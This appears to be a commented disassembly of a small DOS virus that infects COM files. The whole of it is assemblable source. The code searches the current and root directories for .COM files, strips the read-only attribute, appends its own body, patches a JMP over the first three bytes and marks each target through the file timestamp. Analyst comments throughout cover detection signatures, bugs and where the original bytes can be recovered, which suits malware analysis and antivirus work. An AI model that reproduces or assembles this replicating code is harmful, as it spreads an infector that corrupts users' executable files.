	page	,132
;
;  name: cssr.vom
;
;  program type: com/bin
;
;  cpu type: 8086/8087
;
;  program loaded at 0000:0100
;
;  physical eof at 0000:0518
;
;  program entry point at 0000:0100
;
;
;  Single segment for code and data; CS, DS, ES and SS are all assumed to
;  address it (COM-style image, loaded at offset 0100h).
;
fun	segment
assume	cs:fun,ds:fun,es:fun,ss:fun
;
;  start of program
;
;  Host portion of the infected file (0100h-0307h). Only the first three
;  bytes differ from the original host: they hold a near JMP to the
;  appended code at h_0308. The three bytes they replaced are kept in
;  saved_prog_start (h_049a) and copied back at run time.
;
	org	0100h
h_0100:
	jmp	h_0308				;goto virus (E9 + 16-bit displacement)
h_0103	db	0007h dup (90h)				;0103 .
;  Host code bytes are listed as raw data, not decoded.
;  NOTE(review): presumably a small print-string/exit stub; confirm
;  against the sample before relying on that.
	db	0eh,1fh,0b4h,09h,0bah,18h,0cdh,21h	;010a .......!
	db	0b8h,4ch,0cdh				;0112 .L.
;  Host message text, terminated by '$'.
	db	"!Hello Ikv11 ! *****************"
	db	"********************************"
	db	"********************************"
	db	"*****************************"
h_0192	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"******************************"
h_0210	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"********************************"
	db	"**********************$"
	db	1ah					;0307 . (last host byte; appended code starts at 0308)
;
;  Entry point of the appended code (reached through the JMP at 0100h).
;  Pushes DS and a zero word, loads SI with "varptr" (the address of the
;  variable area, h_049a), then opens the file named at varptr+4ah, reads
;  its first 3 bytes into diskbuf and compares them with the 3 bytes at
;  0100h in memory. On a mismatch the warn_msg text is printed and one key
;  is read. Any DOS error branches to h_0356.
;
;  Analyst note: the 16-bit immediate of the MOV SI below (label h_030d)
;  is overwritten for every new copy by the store "mov [di],ax" in the
;  write path, so this word varies between infected files and should be
;  treated as a wildcard in a byte signature.
;
h_0308:
	push	ds				;save PSP seg
	xor	ax,ax				;get a 0
	push	ax				;to stack (popped again at h_048d)
h_030d	equ	$+1		;varptr (address of the immediate in the next MOV)
	mov	si,offset h_049a		;si = varptr
	mov	dx,si				;get varptr
	add	dx,+4ah				;up to name in old DTA (h_04e4)
	mov	ax,3d00h			;fn = open for read-only
	int	21h				;call DOS
	jae	h_031e				;OK, continue
	jmp	short h_0356			;else skip processing
	db	90h				;nop probably due to masm
h_031e:
	mov	bx,ax				;handle to bx
	mov	ah,3fh				;fn = read file
	mov	cx,0003h			;size of starting JMP
	mov	dx,si				;get varptr
	add	dx,+7fh				;up to diskbuf (h_0519)
	nop					;poor programming (no effect)
	int	21h				;call DOS
	jae	h_0332				;OK, continue
	jmp	short h_0356			;else skip processing
	db	90h				;nop probably due to masm
h_0332:
	cmp	ax,0003h			;all bytes read?
	jnz	h_0356				;no, skip processing
	mov	bx,si				;get varptr
				;BUG: Handle destroyed!
				;(the handle opened above is never closed)
	add	si,+7fh				;up to diskbuf (h_0519)
	nop					;poor programming (no effect)
	mov	di,0100h			;start of COM file
	cld					;up!
	repz	cmpsb				;correct start? (count still in cx)
	cmp	cx,+00h				;check again! (tests count left, not the flags)
	jz	h_0356				;yes, go on
	mov	dx,bx				;get varptr
	add	dx,+57h				;up to warn_msg (h_04f1)
	nop					;poor programming (no effect)
	mov	ah,09h				;fn = print string
	int	21h				;call DOS
	mov	ah,01h				;fn = keyboard input
	int	21h				;call DOS
;
;  Restore the host start and prepare the directory search.
;  Copies the 3 bytes at saved_prog_start back to 0100h, points the DTA at
;  local_dta (varptr+2ch), clears the root flag kept in BP and leaves DX at
;  wildcard_com (varptr+07h) for the find-first call at h_037b.
;  On exit: DI = varptr, BX = local_dta, BP = 0.
;
h_0356:
	mov	si,bx				;get varptr
				;BUGS:  1) BX should be handle, so it can
				;          be closed!
				;       2) BX is NOT varptr, unless this
				;          virus found the file and
				;          processed it!
	mov	dx,si				;to dx, too
	add	si,+00h				;up to saved_prog_start (h_049a)
	cld					;up!
	mov	cx,0003h			;size of saved_prog_start
	mov	di,0100h			;normal COM start
	repz	movsb				;replace COM start (in memory only)
	mov	di,dx				;get varptr
	mov	dx,002ch			;ofs to local_dta (h_04c6)
	add	dx,di				;plus varptr
	mov	bx,dx				;to bx, too!
	mov	ah,1ah				;fn = set DTA
	int	21h				;call DOS
	mov	bp,0000h			;clear rootflag
	mov	dx,di				;get varptr
	add	dx,+07h				;up to wildcard_com (h_04a1)
;
;  Directory scan. Runs find-first / find-next over the pattern at DS:DX
;  ("????????.COM") with attribute mask 0003h. When the search is exhausted
;  (error 12h) and the root flag in BP is still clear, DX is moved back one
;  byte so the pattern becomes "\????????.COM" and the scan is repeated
;  once. Any other error, or exhaustion with the flag already set, ends
;  at h_048d. A successful find continues at h_03a0.
;
h_037b:
	mov	cx,0003h			;attributes = HIDDEN, R/O
	mov	ah,4eh				;fn = find first matching file
	int	21h				;call DOS
	jmp	short h_0389			;goto common code
	db	90h				;nop probably due to masm
h_0385:
	mov	ah,4fh				;fn = find next matching file
	int	21h				;call DOS
h_0389:
	jae	h_03a0				;OK, continue
	cmp	al,12h				;error = no more files?
	jz	h_0392				;yes, stick around
	jmp	h_048d				;else we're done
h_0392:
	cmp	bp,-01h				;check rootflag
	jnz	h_039a				;no, continue
	jmp	h_048d				;else we're done
h_039a:
	dec	dx				;backup ptr to root_wildcom
	mov	bp,0ffffh			;set rootflag
	jmp	short h_037b			;and try again
;
;  Candidate filter and target preparation (BX = local_dta, DI = varptr).
;  A found file is skipped when the seconds/2 field of its timestamp
;  equals 2 (the marker written at h_0470), or when the low word of its
;  size is above 0fa00h or below 0100h. Otherwise its name is copied to
;  infect_name (with a leading '\' when the root flag is set), its
;  attributes are read and saved, the read-only bit is cleared and the
;  file is opened read/write.
;
;  Analyst note: the "already processed" decision rests on the timestamp
;  alone; file content is not examined here. The marker is therefore a
;  weak indicator when used by itself for detection.
;
h_03a0:
	mov	cl,[bx+16h]			;get time (low) from DTA
	and	cl,1fh				;isolate seconds/2
	cmp	cl,02h				;signature seconds/2
	jz	h_0385				;yes, try next file
	cmp	word ptr [bx+1ah],0fa00h	;too big? (64000 dec)
	ja	h_0385				;yes, try next file
	cmp	word ptr [bx+1ah],0100h		;too small? (256 dec)
	jnae	h_0385				;yes, try next file
				;BUG: Need to check high word, too!
	push	di				;save varptr
	mov	si,bx				;get ptr to DTA
	add	si,+1eh				;up to filename in DTA
	add	di,+14h				;up to infect_name (h_04ae)
	cmp	bp,-01h				;check root_flag
	jnz	h_03ca				;not set, skip this
	mov	al,5ch				;the leading '\'
	stosb					;put it in infect name
h_03ca:
	lodsb					;get name byte from DTA
	stosb					;add to infect_name
	cmp	al,00h				;at EOS?
	jnz	h_03ca				;no, get next byte
	pop	di				;restore varptr
	mov	dx,di				;to dx, too
	add	dx,+14h				;up to infect_name (h_04ae)
	mov	ax,4300h			;fn = get file attributes
	int	21h				;call DOS
				;NOTE: Why?  They are in the DTA!
	mov	[di+22h],cx			;save attributes  (h_04bc)
	and	cx,-02h				;turn off read-only
	mov	dx,di				;get varptr
	add	dx,+14h				;up to infect_name (h_04ae)
	mov	ax,4301h			;fn = set file attributes
	int	21h				;call DOS
	mov	dx,di				;get varptr
	add	dx,+14h				;up to infect_name (h_04ae)
	mov	ax,3d02h			;fn = open file for read/write
	int	21h				;call DOS
	jae	h_03fa				;OK, continue
	jmp	h_0485				;else quit
;
;  File modification path (BX = file handle, DI = varptr).
;  Saves the file time/date, reads the target's first 3 bytes into
;  saved_prog_start, seeks to EOF to obtain the size, stores size-3 as the
;  JMP displacement, rewrites the varptr immediate at h_030d for the new
;  load address, appends 0210h bytes starting at h_0308, then seeks to the
;  start and overwrites the first 3 bytes with virus_jmp. Every failure
;  branches to h_0470.
;
;  Resulting on-disk layout, as the code writes it: E9 + (old size - 3) at
;  offset 0, the original content from offset 3 onward, then 0210h
;  appended bytes. The original first 3 bytes sit at offset 0192h inside
;  the appended part (saved_prog_start), which is where a cleaner would
;  recover them from.
;
h_03fa:
	mov	bx,ax				;handle to bx
	mov	ax,5700h			;fn = get file time/date
	int	21h				;call DOS
	mov	[di+24h],cx			;save file_time  (h_04be)
	mov	[di+26h],dx			;and file_date  (h_04c0)
				;NOTE: Why?  They are in the DTA!
	mov	ah,3fh				;fn = read file
	mov	cx,0003h			;size of saved_prog_start
	mov	dx,di				;get varptr
	add	dx,+00h				;up to saved_prog_start (h_049a)
	int	21h				;call DOS
	jae	h_0418				;OK, continue
	jmp	short h_0470			;else we're done
	db	90h				;nop probably due to masm
h_0418:
	cmp	ax,0003h			;all bytes read?
	jnz	h_0470				;no, we're done
	mov	ax,4202h			;fn = lseek to EOF+CX:DX
	mov	cx,0000h			;cx:dx = 0
	mov	dx,cx
	int	21h				;call DOS (returns position in dx:ax)
	sub	ax,0003h			;size minus JMP size
	mov	[di+04h],ax			;save virus_jmp_ofs (h_049e)
	mov	cx,offset h_049a-h_0308		;ofs to varptr (0192h)
	cmp	dx,+00h				;file > 64K?
	jnz	h_0470				;yes, we're done
	mov	dx,di				;get varptr
	sub	di,cx				;back to start of virus
	add	di,+05h				;up to varptr in memory
	add	ax,0103h			;JMP ofs + JMP size + PSP size
	add	ax,cx				;plus ofs to start of vars
	mov	[di],ax				;set varptr for next inf(h_030d)
	mov	ah,40h				;fn = write to file
	mov	di,dx				;get varptr
	sub	dx,cx				;back to start of virus
	mov	cx,offset h_0518-h_0308		;virus size (0210h)
	int	21h				;call DOS
	jae	h_0453				;OK, continue
	jmp	short h_0470			;else we're done
	db	90h				;nop probably due to masm
h_0453:
	cmp	ax,offset h_0518-h_0308		;all bytes written? (0210h)
	jnz	h_0470				;no, we're done
	mov	ax,4200h			;fn = lseek to BOF+CX:DX
	mov	cx,0000h			;cx:dx = 0
	mov	dx,cx
	int	21h				;call DOS
	jnae	h_0470				;error, quit
	mov	ah,40h				;fn = write to file
	mov	cx,0003h			;size of virus_jmp
	mov	dx,di				;get varptr
	add	dx,+03h				;up to virus_jmp (h_049d)
	int	21h				;call DOS (result not checked)
;
;  Cleanup and hand-over to the host (BX = file handle, DI = varptr).
;  h_0470: rewrites the file timestamp with the seconds/2 field forced to
;          2, then closes the handle.
;  h_0485: issues a set-attributes call.
;  h_048d: resets the DTA to the default at 0080h and transfers control to
;          0100h by pushing that address and executing RET.
;
;  Analyst note: h_0470 is also the target of every failure branch in the
;  write path (short read, size over 64K, failed or short write, failed
;  seek). A file carrying the timestamp marker has therefore been opened
;  by this code but has not necessarily been modified; check for the
;  leading E9 JMP and the appended 0210h bytes before classifying it.
;
h_0470:
	mov	cx,[di+24h]			;get file_time
	mov	dx,[di+26h]			;and file_date
	and	cx,-20h				;turn off seconds/2
	or	cl,02h				;set signature seconds/2
	mov	ax,5701h			;fn = set file time/date
	int	21h				;call DOS
	mov	ah,3eh				;fn = close file
	int	21h				;call DOS
h_0485:
	mov	ax,4301h			;fn = set file attributes
	mov	cx,[di+16h]			;get attributes (h_04b0)
			;note: saved earlier at [di+22h] (h_04bc), read
			;      here from [di+16h], inside infect_name
			;BUG: Needs ds:dx = filename to set attributes!
	int	21h				;call DOS
h_048d:
	mov	dx,0080h			;ds:dx = default DTA
	mov	ah,1ah				;fn = set DTA
	int	21h				;call DOS
	pop	ax				;get 0 (fake drive validity)
	mov	di,0100h			;normal COM start
	push	di				;to stack
	ret					;run infected program
;
;
;  Variable area ("varptr" = h_049a). The code reaches every field as
;  varptr+offset, never by absolute address:
;    +00h saved_prog_start   +03h virus_jmp      +04h virus_jmp_ofs
;    +06h root_wildcom       +07h wildcard_com   +14h infect_name
;    +22h attributes         +24h file_time      +26h file_date
;    +2ch local_dta          +4ah name in DTA    +57h warn_msg
;    +7fh diskbuf (past the end of the image, see h_0519)
;  NOTE(review): the name, time, date and DTA contents below look like
;  leftovers from the run that wrote this copy - confirm against the sample.
;  Fixed text usable for string matching: the wildcard "????????.COM" and
;  the warning message at h_04f1.
;
h_049a	db	90h,90h,90h			;saved_prog_start (host's original first 3 bytes)
h_049d	db	0e9h				;virus_jmp (near JMP opcode)
h_049e	dw	0205h				;virus_jmp_ofs
h_04a0	db	"\"				;root_wildcom
h_04a1	db	"????????.COM"			;wildcard_com
;	db	5ch,3fh,3fh,3fh,3fh,3fh,3fh,3fh		;04a0
;	db	3fh,2eh,43h,4fh,4dh			;04a8
	db	00h					;04ad
h_04ae	db	"VIRIKV.COM"			;infect_name
;	db	56h,49h,52h,49h,4bh,56h,2eh,43h		;04ae
;	db	4fh,4dh					;04b6
	db	00h					;04b8
	db	4dh,00h,00h				;04b9 M..
h_04bc	dw	0020h				;attributes
h_04be	dw	0befbh				;file_time
h_04c0	dw	152eh				;file_date
;
	db	00h,00h,00h,00h			;04c2 ....
;
;   local_dta
;   (the code reads time at +16h, size low word at +1ah, name at +1eh)
;
h_04c6	db	01h					;04c6 .
	db	"????????COM"
;	db	3fh,3fh,3fh,3fh,3fh,3fh,3fh,3fh		;04c7
;	db	43h,4fh,4dh				;04cf
	db	03h,0bh,00h,00h,00h,00h,00h,00h		;04d2 ........
	db	00h,20h,0fbh,0beh,2eh,15h,08h,02h	;04da . ......
	db	00h,00h					;04e2 ..
h_04e4	db	"VIRIKV.COM"			;name in DTA
;	db	56h,49h,52h,49h,4bh,56h,2eh,43h		;04e4
;	db	4fh,4dh					;04ec
	db	00h					;04ee
	db	4dh,00h					;04ef M.
h_04f1	db	0dh				;warn_msg
	db	"Warning : File is damaged by virus !!!"
					;BUG: They forgot the '$'
					;     string terminator!
;
h_0518	equ	$		;end of file (h_0518-h_0308 = 0210h appended bytes)
h_0519	equ	$+1		;diskbuf (scratch beyond the image, not stored on disk)
fun	ends
	end	h_0100
